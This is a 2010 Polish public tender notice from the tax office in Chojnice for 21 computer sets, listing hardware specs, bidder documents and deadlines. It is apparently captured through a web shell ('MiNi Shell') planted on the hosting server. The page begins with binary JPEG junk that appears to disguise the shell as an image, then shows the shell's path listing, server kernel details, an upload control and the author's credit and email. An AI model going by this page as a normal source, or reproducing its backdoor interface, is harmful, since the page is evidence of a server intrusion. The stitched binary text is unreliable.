JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100909/285430-N-2010.html

<p class="kh_header"><b>Chojnice: zakup i dostawę sprzętu komputerowego dla potrzeb Urzędu  Skarbowego w Chojnicach</b><br>
<b>Numer ogłoszenia: 285430 - 2010; data zamieszczenia: 09.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy , ul. Młyńska 22, 89-600 Chojnice, woj. pomorskie, tel. 052 3965400, faks 052 3965448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uschojnice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> ---</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zakup i dostawę sprzętu komputerowego dla potrzeb Urzędu  Skarbowego w Chojnicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa następującego sprzętu komputerowego:

I Zestaw komputerowy  z oprogramowaniem - 18 sztuk

Parametry, Wymagania minimalne
1.Procesor 
Dwurdzeniowy procesor klasy x86,
Częstotliwość taktowania: min. 2.26 Ghz,
Częstotliwość taktowania szyny danych (FSB): min. 1066 MHz
Rozmiar pamięci cache 2 poziomu (L2): min. 3 MB 
2.Płyta główna 
Zapewniająca minimum:obsługę urządzeń SATA, obsługę procesora (lp. 1)  
Wyposażona w minimum: 2 gniazda pamięci DDR2, min. 1x PCI Express x16
obsługę min. 4 GB RAM,gniazda PS2: 2 porty PS2 lub zewnętrzny konwerter USB/PS2 z 2 portami PS2, gniazda LPT: 1 port LPT lub zewnętrzny konwerter USB/LPT,port USB: 4 porty USB 2.0 
3. Pamięć RAM
min. 2 GB DDR2 min. 800 MHz 
4.Dysk twardy
min. 230 GB serial ATA, 
prędkość obrotowa min. 7200 rpm
5.Karta dźwiękowa
Zintegrowana karta dźwiękowa min. 16-bitowa
6.Karta graficzna 
Zintegrowana, minimum 256 MB pamięci własnej, lub współdzielonej z pamięcią systemową (nie wymaga się uzupełnienia pamięci operacyjnej w przypadku współdzielenia); posiadająca złącze D-SUB 15 pin i/lub DVI (w przypadku zastosowania złącza DVI musi być dołączony konwerter umożliwiający podłączenie urządzenia posiadającego złącze D-SUB 15 pin)
7.Komunikacja przewodowa
Ethernet ,obsługująca przepustowości: 10/100/1000 ze złączem RJ 45.
Obsługująca następujące min. Ustawienia trybów: 10Mbps half i full dupleks, 100Mbps half i full dupleks oraz Auto.
8.Obudowa
Suma wymiarów obudowy (szerokość+głębokość+wysokość) nie przekraczająca 280 cm
Wyposażona w min.:
min. 6 złącza USB,
min. 1 wyjście audio mini-jack,
min. 1  wejście mikrofonowe mini-jack,
9.Zużycie energii
Zasilacz o mocy maksymalnej 350W spełniający kryteria normy Energy Star 
10.Normy
Certyfikaty jakości ISO 9001 i 14001
Certyfikacja Energy Star 
11.Napęd optyczny
Wbudowana nagrywarka DVD ? RW
12.Stacja dyskietek 
Wbudowana stacja dyskietek FDD
13.Wyposażenia
kabel zasilający
kabel przyłączeniowy UTP 4p, 2 x RJ45 min kat. 5e, długość min 5m
14.Gwarancja
Urządzenie objęte minimum 3-letnią gwarancją producenta, jego przedstawiciela w Polsce lub wykonawcy ze skutecznym czasem naprawy w następnym dniu roboczym, potwierdzone oświadczeniem Wykonawcy przedłożonym w dniu odbioru dostawy. Możliwość otwarcia obudowy i dołożenia komponentów przez wykwalifikowany personel  Zamawiającego, bez utraty gwarancji .
15.Zainstalowany system operacyjny, oprogramowanie 
Licencja dla Windows 7 Professional 32bit z prawami do instalacji Windows XP Professional w polskiej wersji językowej, Windows 7 Professional (preinstalowany na dysku twardym) wraz z nośnikiem pozwalającym na ponowną instalację systemu niewymagającą wpisywania klucza rejestracyjnego lub rejestracji poprzez Internet czy telefon, nośnik Windows XP Professional 32bit w polskiej wersji językowej - płyta przygotowana przez producenta lub autoryzowanego dystrybutora komputera do automatycznej instalacji na danej jednostce (system wraz ze sterownikami), niewymagająca wpisywania klucza rejestracyjnego lub rejestracji poprzez Internet czy telefon, lub równoważny:
posiadający co najmniej te same funkcjonalności,
kompatybilny z oprogramowaniem przeznaczonym dla ww. systemów.
Program do nagrywania płyt CD-RW, DVD-RW w polskiej wersji językowej 
(nośnik i licencja).
Komplet sterowników do poszczególnych podzespołów, tym dla  ww. systemu operacyjnego na nośnikach CD-Rom lub DVD-ROM.
16.Monitor LCD 19
Wielkość ekranu: Obszar widoczny min 19-cali przekątnej 
Współczynnik proporcji obrazu: Panoramiczny 
Typ matrycy: TN - Twisted Nematic
Rozdzielczość min: 1440x900 przy 60 Hz
Kontrast min: 5000 do 1 
Jasność min: 300 cd/m2 
Czas reakcji max: 5 ms 
Kąt widzenia min: 160 (w pionie)/160 (w poziomie)
Odwzorowanie kolorów min: 16,7 mln kolorów
Rozstaw pikseli max: 0,284 x 0,284 mm
Złącza: D-SUB
Waga netto max: 4,0 kg
Normy: TCO 03, Energy Star.
Głośniki w obudowie lub dedykowane (montowane przy monitorze)
Zasilacz w obudowie monitora
Przewód zasilający min: 1,5m
Kable: D-SUB
Nośnik ze sterownikami i dokumentacją 
Gwarancja min: 3 lata
17.Klawiatura 
Przewodowa w układzie US, polskie znaki zgodne z układem w MS Windows/polski programisty/, nad zespołem wydzielonych klawiszy kursorów, klawisze w następującym układzie:
Klawiatura musi być wyposażona w  2 klawisze ALT (prawy i lewy)
Klawiatura spełnia zalecenia określone w pkt 3.2 i 3.3 załącznika do rozporządzenia Ministra Pracy i Polityki Socjalnej z dnia 1 grudnia 1998 r. w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe (Dz. U. Nr 148, poz. 973), złącze:  PS2 lub USB
18.Mysz
Przewodowa optyczna, min. Dwa przyciski, jedna rolka, złącze USB, podkładka pod mysz 

II Zestaw komputerowy  z oprogramowaniem - 3 sztuki

Parametry,Wymagania minimalne
1.Procesor 
Dwurdzeniowy procesor klasy x86,
Częstotliwość taktowania: min. 2.26 Ghz,
Częstotliwość taktowania szyny danych (FSB): min. 1066 MHz
Rozmiar pamięci cache 2 poziomu (L2): min. 3 MB 
2.Płyta główna 
Zapewniająca minimum:obsługę urządzeń SATA,obsługę procesora (lp. 1)  
Wyposażona w minimum:2 gniazda pamięci DDR2, min. 1x PCI Express x16
obsługę min. 4 GB RAMgniazda PS2: 2 porty PS2 lub zewnętrzny konwerter USB/PS2 z 2 portami PS2, gniazda LPT: 1 port LPT lub zewnętrzny konwerter USB/LPT port USB: 4 porty USB 2.0 
3.Pamięć RAM
min. 4 GB DDR2 min. 800 MHz 
4.Dysk twardy
min. 230 GB serial ATA, prędkość obrotowa min. 7200 rpm
5.Karta dźwiękowa
Zintegrowana karta dźwiękowa min. 16-bitowa
6.Karta graficzna 
Zintegrowana, minimum 256 MB pamięci własnej, lub współdzielonej z pamięcią systemową (nie wymaga się uzupełnienia pamięci operacyjnej w przypadku współdzielenia); posiadająca złącze D-SUB 15 pin i/lub DVI (w przypadku zastosowania złącza DVI musi być dołączony konwerter umożliwiający podłączenie urządzenia posiadającego złącze D-SUB 15 pin)
7.Komunikacja przewodowa
Ethernet ,obsługująca przepustowości: 10/100/1000 ze złączem RJ 45.
Obsługująca następujące min. Ustawienia trybów: 10Mbps half i full dupleks, 100Mbps half i full dupleks oraz Auto.
8.Obudowa
Suma wymiarów obudowy (szerokość+głębokość+wysokość) nie przekraczająca 280 cm
Wyposażona w min.: min. 6 złącza USB, min. 1 wyjście audio mini-jack,
min. 1  wejście mikrofonowe mini-jack,
9.Zużycie energii
Zasilacz o mocy maksymalnej 350W spełniający kryteria normy Energy Star 
10.Normy
Certyfikaty jakości ISO 9001 i 14001
Certyfikacja Energy Star 
11.Napęd optyczny
Wbudowana nagrywarka DVD ? RW
12.Stacja dyskietek 
Wbudowana stacja dyskietek FDD
13.Wyposażenia
kabel zasilający
kabel przyłączeniowy UTP 4p, 2 x RJ45 min kat. 5e, długość min 5m
14.Gwarancja
Urządzenie objęte minimum 3-letnią gwarancją producenta, jego przedstawiciela w Polsce lub wykonawcy ze skutecznym czasem naprawy w następnym dniu roboczym, potwierdzone oświadczeniem Wykonawcy przedłożonym w dniu odbioru dostawy. Możliwość otwarcia obudowy i dołożenia komponentów przez wykwalifikowany personel  Zamawiającego, bez utraty gwarancji .
15.Zainstalowany system operacyjny, oprogramowanie 
Licencja dla Windows 7 Professional 32bit z prawami do instalacji Windows XP Professional w polskiej wersji językowej, Windows 7 Professional (preinstalowany na dysku twardym) wraz z nośnikiem pozwalającym na ponowną instalację systemu niewymagającą wpisywania klucza rejestracyjnego lub rejestracji poprzez Internet czy telefon, nośnik Windows XP Professional 32bit w polskiej wersji językowej - płyta przygotowana przez producenta lub autoryzowanego dystrybutora komputera do automatycznej instalacji na danej jednostce (system wraz ze sterownikami), niewymagająca wpisywania klucza rejestracyjnego lub rejestracji poprzez Internet czy telefon, lub równoważny:
posiadający co najmniej te same funkcjonalności,
kompatybilny z oprogramowaniem przeznaczonym dla ww. systemów.
Program do nagrywania płyt CD-RW, DVD-RW w polskiej wersji językowej 
(nośnik i licencja).
Komplet sterowników do poszczególnych podzespołów, tym dla  ww. systemu operacyjnego na nośnikach CD-Rom lub DVD-ROM.
16.Monitor LCD 19
Wielkość ekranu: Obszar widoczny min 19-cali przekątnej 
Współczynnik proporcji obrazu: Panoramiczny 
Typ matrycy: TN - Twisted Nematic
Rozdzielczość min: 1440x900 przy 60 Hz
Kontrast min: 5000 do 1 
Jasność min: 300 cd/m2 
Czas reakcji max: 5 ms 
Kąt widzenia min: 160 (w pionie)/160 (w poziomie)
Odwzorowanie kolorów min: 16,7 mln kolorów
Rozstaw pikseli max: 0,284 x 0,284 mm
Złącza: D-SUB
Waga netto max: 4,0 kg
Normy: TCO 03, Energy Star.
Głośniki w obudowie lub dedykowane (montowane przy monitorze)
Zasilacz w obudowie monitora
Przewód zasilający min: 1,5m
Kable: D-SUB
Nośnik ze sterownikami i dokumentacją 
Gwarancja min: 3 lata
17.Klawiatura 
Przewodowa w układzie US, polskie znaki zgodne z układem w MS Windows /polski programisty/, nad zespołem wydzielonych klawiszy kursorów, klawisze w następującym układzie:
Klawiatura musi być wyposażona w  2 klawisze ALT (prawy i lewy)
Klawiatura spełnia zalecenia określone w pkt 3.2 i 3.3 załącznika do rozporządzenia Ministra Pracy i Polityki Socjalnej z dnia 1 grudnia 1998 r. w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe (Dz. U. Nr 148, poz. 973), złącze: PS2 lub USB
18.Mysz
Przewodowa optyczna, min. Dwa przyciski, jedna rolka, złącze USB, podkładka pod mysz.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.33.00-8, 48.62.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek nie został opisany</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca udokumentuje dostawy w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat  przed upływem terminu składania ofert tj od 01.09.2007 r. do 31.08.210 r. , a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie.
Do wykazu Wykonawca zobowiązany jest załączyć dokumenty potwierdzające, dane zawarte w wykazie tj. przedmiot,  wartość, daty i miejsca wykonania, że dostawy zostały wykonane lub są wykonywane należycie.

Wykaz dostaw Wykonawca sporządzi na druku stanowiącym ZAŁĄCZNIK NR 4 do niniejszej SIWZ (w przypadku, gdy Wykonawcy występują wspólnie druk podpisze Pełnomocnik, zgodnie z art. 23  ustawy).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek nie został opisany</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek nie został opisany</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek nie został opisany</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.oryginał pełnomocnictwa lub kopię poświadczoną notarialnie, Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ust. 2 ustawy. Pełnomocnictwo musi wskazywać Pełnomocnika, musi wymieniać wszystkich Wykonawców wspólnie ubiegających się o zamówienie oraz każdy z tych Wykonawców musi potwierdzić podpisem ustanowienie pełnomocnictwa zgodnie z pkt X SIWZ (włącznie z podpisem podmiotu umocowanego na podstawie pełnomocnictwa, jeżeli jest on jednym z Wykonawców wspólnie ubiegających się o udzielenie zamówienia). Ponadto /Pełnomocnictwo/ w szczególności powinno wskazywać czy dotyczy: reprezentowania wszystkich Wykonawców w postępowaniu i zawarcia umowy o zamówienie publiczne w ich imieniu, czy tylko reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia. w przypadku spółek cywilnych należy dołączyć umowę spółki cywilnej, w której będą dane o sposobie reprezentacji spółki na zewnątrz,
2.wykaz części zamówienia których wykonanie Wykonawca powierzy Podwykonawcom, sporządzony na druku stanowiącym ZAŁĄCZNIK NR 5 do niniejszej SIWZ;
3.pisemne zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia- jeżeli Wykonawca będzie polegał na wiedzy i doświadczeniu tych podmiotów oraz osobach zdolnych do wykonania zamówienia,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Dopuszczalne zmiany postanowień umowy:
1)zmiany nazwy, siedziby firmy, konta bankowego Wykonawcy lub Zamawiającego (zmian podmiotowych),
2)zmiany spowodowane przekształceniem przepisów ustaw wymienionych w Umowie,
3)wprowadzenia lub zmiany Podwykonawcy usług, w następujących przypadkach:
a)śmierci, choroby (w przypadku osób fizycznych) lub innych zdarzeń losowych;
b)nie wywiązanie się z obowiązków wynikających z przepisów;
c)jeżeli zmiana Podwykonawcy stanie się konieczna z jakiejkolwiek innych przyczyn niezależnych od Zamawiającego/Wykonawcy (np. rezygnacja).
4)Z powodu okoliczności siły wyższej, w szczególności zagrażającej bezpośrednio życiu lub zdrowiu ludzi lub grożącej powstaniem szkody w znaczących rozmiarach.
5)Zmiana podmiotu, który zobowiązał się do oddania Wykonawcy do dyspozycji niezbędnych zasobów w celu realizacji niniejszego zamówienia, pod warunkiem, że Wykonawca przedstawi zobowiązanie nowego podmiotu przed upływem ważności poprzedniego zobowiązania.
Strona występująca o zmianę postanowień Umowy zobowiązana jest do udokumentowania zaistnienia
okoliczności. Wniosek o zmianę postanowień Umowy musi być wyrażony na piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uschojnice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy w Chojnicach, ul. Młyńska 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2010 godzina 10:30, miejsce: Urząd Skarbowy w Chojnicach, ul. Młyńska 22, pokój nr 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com